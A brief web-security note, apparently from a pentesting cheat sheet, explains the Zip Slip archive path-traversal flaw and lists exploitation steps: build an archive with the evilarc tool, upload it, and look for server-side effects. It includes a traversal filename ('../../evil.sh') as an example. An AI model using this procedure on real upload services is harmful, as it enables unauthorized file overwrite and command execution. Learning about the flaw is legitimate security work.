As per the synk.io’s: Zip Slip is a widespread arbitrary file overwrite critical vulnerability, which typically results in remote command execution. The vulnerability is exploited using a specially crafted archive that holds directory traversal filenames (e.g. ../../evil.sh). The Zip Slip vulnerability can affect numerous archive formats, including tar, jar, war, cpio, apk, rar and 7z.
How to Exploit?
- Using the following tool, create a malicious zip file: https://github.com/ptoomey3/evilarc
- Upload the malicious zip file using the zip upload functionality
- If accepted and uploaded successfully, try to check for the endpoints that reflects the results of the uploaded file or try to check for any unintended behavior from the server/application for further exploitation.
Interesting Research Read:
- https://snyk.io/research/zip-slip-vulnerability
- https://github.com/snyk/zip-slip-vulnerability